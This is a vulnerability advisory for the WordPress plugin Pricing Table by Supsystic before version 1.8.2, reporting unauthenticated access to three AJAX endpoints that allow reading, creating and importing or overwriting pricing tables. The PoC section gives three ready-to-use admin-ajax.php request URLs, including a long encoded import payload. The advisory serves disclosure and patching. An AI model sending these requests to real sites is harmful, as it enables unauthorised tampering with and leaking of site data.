Chloe ChamberlandWPVDB-ID:5284A0BB-DE49-43ED-9FC1-381405C1315EPricing Table by Supsystic < 1.8.2 - Insecure Permissions on AJAX Actions
0.001 Low
EPSS
Percentile
51.3%
An issue was discovered in the pricing-table-by-supsystic plugin before 1.8.2 for WordPress. Because there is no permission check on the ImportJSONTable, createFromTpl, and getJSONExportTable endpoints, unauthenticated users can retrieve pricing table information, create new tables, or import/modify a table.
PoC
URL/wp-admin/admin-ajax.php?mod=tables&action;=importJSONTable&data;%5B0%5D%5Bid%5D=11&data;%5B0%5D%5Bunique_id%5D=Pwn8M1EB&data;%5B0%5D%5Blabel%5D=&data;%5B0%5D%5Boriginal_id%5D=11&data;%5B0%5D%5Bparams%5D%5Bbg_color%5D%5Bval%5D=%23424242&data;%5B0%5D%5Bparams%5D%5Btxt_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl%22+data-el%3D%22table_cell_txt%22+data-type%3D%22txt%22%3E%3Cp%3E%3Cspan+style%3D%22font-size%3A+12pt%3B%22+data-mce-style%3D%22font-size%3A+12pt%3B%22%3EYour+Text%3C%2Fspan%3E%3C%2Fp%3E%3C%2Fdiv%3E&data;%5B0%5D%5Bparams%5D%5Bimg_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl+ptsElImg+ptsElWithArea%22+data-el%3D%22table_cell_img%22+data-type%3D%22img%22%3E%0D%0A%09%3Cdiv+class%3D%22ptsElArea%22%3E%3Cimg+src%3D%22http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fexample.jpg%22+%2F%3E%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E&data;%5B0%5D%5Bparams%5D%5Bicon_item_html%5D%5Bval%5D=%3Cdiv+data-icon%3D%22fa-cog%22+data-color%3D%22rgb(0%2C+220%2C+223)%22+data-type%3D%22icon%22+data-el%3D%22table_cell_icon%22+class%3D%22ptsIcon+ptsEl+ptsElInput%22%3E%3Ci+class%3D%22fa+fa-2x+ptsInputShell+fa-cog%22+style%3D%22color%3A+rgb(0%2C+220%2C+223)%3B%22%3E%3C%2Fi%3E%3C%2Fdiv%3E&data;%5B0%5D%5Bparams%5D%5Bnew_column_html%5D%5Bval%5D=&data;%5B0%5D%5Bparams%5D%5Bnew_cell_html%5D%5Bval%5D=&data;%5B0%5D%5Bparams%5D%5Bcell_color_css%5D%5Bval%5D=&data;%5B0%5D%5Bparams%5D%5Benb_desc_col%5D%5Bval%5D=1&data;%5B0%5D%5Bparams%5D%5Bcol_width%5D%5Bval%5D=186&data;%5B0%5D%5Bparams%5D%5Bcols_num%5D%5Bval%5D=4&data;%5B0%5D%5Bparams%5D%5Brows_num%5D%5Bval%5D=5&data;%5B0%5D%5Bparams%5D%5Bcalc_width%5D%5Bval%5D=table&data;%5B0%5D%5Bparams%5D%5Btable_width%5D%5Bval%5D=100&data;%5B0%5D%5Bparams%5D%5Btable_width_measure%5D%5Bval%5D=%25&data;%5B0%5D%5Bparams%5D%5Benb_hover_animation%5D%5Bval%5D=1&data;%5B0%5D%5Bparams%5D%5Bfont_family%5D%5Bval%5D=Raleway&data;%5B0%5D%5Bparams%5D%5Btext_color%5D%5Bval%5D=%23000&data;%5B0%5D%5Bparams%5D%5Btext_color_header%5D%5Bval%5D=%23808080&data;%5B0%5D%5Bparams%5D%5Btext_color_desc%5D%5Bval%5D=%23808080&data;%5B0%5D%5Bparams%5D%5Bresp_min_col_width%5D%5Bval%5D=150&data;%5B0%5D%5Bparams%5D%5Bis_horisontal_row_type%5D%5Bval%5D=0&data;%5B0%5D%5Bhtml%5D=&data;%5B0%5D%5Bcss%5D=&data;%5B0%5D%5Bimg%5D=gradient-standard.jpg&data;%5B0%5D%5Bsort_order%5D=0&data;%5B0%5D%5Bis_base%5D=1&data;%5B0%5D%5Bis_pro%5D=0&data;%5B0%5D%5Bdate_created%5D=2020-01-16+00%3A40%3A10&data;%5B0%5D%5Bimg_url%5D=http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fprev%2Fgradient-standard.jpg&data;%5B0%5D%5Bsession_id%5D=715993&data;%5B0%5D%5Bview_id%5D=ptsBlock_715993&data;%5B0%5D%5Bcat_code%5D=price_table&update;_with_same_id=1&pl;=pts&reqType;=ajax URL/wp-admin/admin-ajax.php?label=Test&original;_id=1&mod;=tables&action;=createFromTpl&pl;=pts&reqType;=ajax URL/wp-admin/admin-ajax.php?mod=tables&action;=getJSONExportTable&tables;%5B%5D=9&tables;%5B%5D=8&pl;=pts&reqType;=ajax
| CPE | Name | Operator | Version |
|---|---|---|---|
| pricing-table-by-supsystic | lt | 1.8.2 |
Related
